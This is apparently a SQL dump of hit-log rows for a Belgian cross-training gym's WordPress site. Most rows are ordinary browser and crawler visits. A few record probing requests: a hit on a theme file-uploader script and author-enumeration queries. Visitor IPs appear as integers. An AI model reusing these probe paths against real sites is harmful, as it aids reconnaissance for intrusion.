(69325, 1492115861.735369, 1375113915, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
(69326, 1492115863.843720, 1375113915, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
(69327, 1492115947.293755, 1375113915, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
(69328, 1492116321.941784, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69329, 1492116322.583975, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69330, 1492116323.064672, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69331, 1492116323.596155, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69332, 1492116324.078600, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69333, 1492116324.584625, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69334, 1492116325.209074, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69335, 1492116325.832450, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69336, 1492116326.473577, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69337, 1492116327.262210, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69338, 1492116327.919422, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69339, 1492122078.015280, 1054099761, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crossmaxx.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(69340, 1492128061.338069, 1355374555, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.it/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69341, 1492133143.115061, 3652617399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69342, 1492148979.635779, 3281697044, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69343, 1492148989.018576, 3281697044, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69344, 1492148995.983316, 3281697044, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69345, 1492155629.211579, 3250558660, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwjm_rHuuKPTAhVKUlAKHbHcBpAQFgguMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&bvm=bv.152479541,d.ZWM', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69346, 1492155630.494641, 3250558660, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69347, 1492155637.889227, 3250558660, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69348, 1492155639.063099, 3250558660, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69349, 1492155646.712897, 3250558660, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69350, 1492155653.817940, 3250558660, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69351, 1492155656.128025, 3250558660, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69352, 1492164369.936965, 2637637558, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69353, 1492164808.935388, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69354, 1492165081.707082, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69355, 1492171490.017836, 2733885780, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'rogerbot/1.1 (http://moz.com/help/guides/search-overview/crawl-diagnostics#more-help, rogerbot-crawler+pr4-crawler-15@moz.com)/Nutch-1.13'),
(69356, 1492173327.760790, 1374961659, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://outlook.live.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69357, 1492173329.429634, 1374961659, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69358, 1492173367.010230, 1374961659, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69359, 1492176401.463191, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php', 'http://crosstrainingcenter.be/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(69360, 1492177484.192576, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69361, 1492177504.113170, 1837489426, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69362, 1492177506.205920, 1837489426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69363, 1492177506.290628, 1837489426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(69364, 1492177506.937423, 1837489426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(69365, 1492177532.179343, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69366, 1492177828.112774, 3652617389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69367, 1492187133.664380, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(69368, 1492187497.736866, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69369, 1492187498.273586, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69370, 1492187498.742182, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69371, 1492187499.187719, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69372, 1492187499.602778, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69373, 1492187500.047640, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69374, 1492187501.580485, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69375, 1492187502.691555, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69376, 1492187503.206120, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69377, 1492187503.747867, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69378, 1492187504.577854, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69379, 1492189092.808858, 1570674695, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69380, 1492193110.605249, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69381, 1492202381.955400, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69382, 1492202382.583233, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69383, 1492202383.402206, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69384, 1492202383.811142, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69385, 1492202384.228616, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69386, 1492202384.803236, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69387, 1492202385.421092, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69388, 1492202385.932677, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69389, 1492202386.479854, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69390, 1492202386.961939, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69391, 1492202387.435715, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69392, 1492203184.971810, 2461634624, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36'),
(69393, 1492205221.705590, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69394, 1492205222.220511, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69395, 1492205222.685583, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69396, 1492205223.152288, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69397, 1492205223.607788, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69398, 1492205224.031344, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69399, 1492205224.511614, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69400, 1492205224.992986, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69401, 1492205225.527169, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69402, 1492205225.972232, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69403, 1492205226.401143, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69404, 1492205226.952371, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69405, 1492205227.503797, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69406, 1492205227.935456, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69407, 1492208968.726050, 3657086681, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69408, 1492209701.834291, 3475901909, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69409, 1492220891.853304, 1355374555, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69410, 1492226766.058043, 3164826793, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=%7Bnum:2%7D', 'http://crosstrainingcenter.be/?author=%7Bnum:2%7D', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69411, 1492228225.040029, 3657086681, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69412, 1492237559.221063, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69413, 1492242150.419973, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69414, 1492243145.121124, 1123634296, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69415, 1492243145.980483, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69416, 1492247103.522514, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69417, 1492247104.220491, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69418, 1492249535.644723, 1123634205, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69419, 1492249536.645390, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69420, 1492251354.346959, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69421, 1492252915.729646, 2637637620, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69422, 1492253885.797132, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69423, 1492257155.100740, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69424, 1492259325.043365, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69425, 1492260546.023947, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69426, 1492262050.759288, 1450079886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(69427, 1492262052.204043, 1450079886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/?author=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(69428, 1492262085.425560, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69429, 1492264147.051595, 2637637600, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69430, 1492265521.116373, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69431, 1492265988.044400, 1538591014, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393'),
(69432, 1492265990.140402, 1538591014, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393'),
(69433, 1492267214.030045, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69434, 1492270717.943942, 3657087268, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69435, 1492272725.613203, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69436, 1492280396.226316, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69437, 1492280408.889615, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69438, 1492281863.276140, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69439, 1492281863.792617, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69440, 1492281864.277733, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69441, 1492281864.723471, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69442, 1492281865.173461, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69443, 1492281865.615382, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69444, 1492281866.183793, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
